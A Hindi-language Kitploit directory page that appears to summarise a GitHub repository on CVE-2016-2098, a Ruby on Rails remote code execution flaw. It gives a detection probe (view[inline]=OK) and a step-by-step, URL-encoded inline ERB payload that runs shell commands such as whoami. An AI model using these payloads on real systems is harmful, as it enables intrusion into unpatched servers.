Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2016-2098 — Ruby-on-Rails में उपयोगकर्ता-प्रदत्त डेटा पर render का उपयोग करने पर दूरस्थ कोड निष्पादन भेद्यता। | Kitploit
उपकरण/GitHubGitHub/j4k0m/cve-2016-2098
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubj4k0m/cve-2016-2098

CVE-2016-2098

Ruby-on-Rails में उपयोगकर्ता-प्रदत्त डेटा पर render का उपयोग करने पर दूरस्थ कोड निष्पादन भेद्यता।

रिपॉजिटरी देखें
44 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2016-2098

Ruby-on-Rails में उपयोगकर्ता द्वारा प्रदान किए गए डेटा पर render का उपयोग करते समय दूरस्थ कोड निष्पादन की भेद्यता।

व्याख्या:

यह समस्या उपयोगकर्ता द्वारा प्रदान किए गए डेटा पर render विधि के उपयोग से उत्पन्न होती है।

render विधि आमतौर पर किसी टेम्पलेट से पेज प्रस्तुत करने के लिए उपयोग की जाती है, लेकिन render विधि डेवलपर्स को सादा पाठ (plaintext) और यहां तक कि इनलाइन कोड (inline) प्रस्तुत करने की भी अनुमति देती है।

render फ़ंक्शन:

root@kitploit:~
# File actionpack/lib/abstract_controller/rendering.rb, line 23
def render(*args, &block)
  options = _normalize_render(*args, &block)
  rendered_body = render_to_body(options)
  if options[:html]
    _set_html_content_type
  else
    _set_rendered_content_type rendered_format
  end
  _set_vary_header
  self.response_body = rendered_body
end

शोषण उदाहरण:

लक्ष्य URL:

root@kitploit:~
http://example.com/?view=test

शोषण:

root@kitploit:~
http://example.com/?view[inline]=OK

यदि स्रोत कोड में 'OK' दिखाई देता है, तो वेब एप्लिकेशन CVE-2016-2098 के प्रति संवेदनशील है।

दूरस्थ कोड निष्पादन

root@kitploit:~
<%= %x('[CMD]') %>

हम CMD को अपने उस कमांड से बदल सकते हैं जिसे हम निष्पादित करना चाहते हैं।

root@kitploit:~
<%= %x('whoami') %>

URL एन्कोडिंग के बाद:

root@kitploit:~
%3C%25=%20%25x(whoami)%20%25%3E

अंतिम:

root@kitploit:~
http://example.com/?view[inline]=%3C%25=%20%25x(whoami)%20%25%3E

संसाधन:

  • https://guides.rubyonrails.org/layouts_and_rendering.html
टूल डाउनलोड करें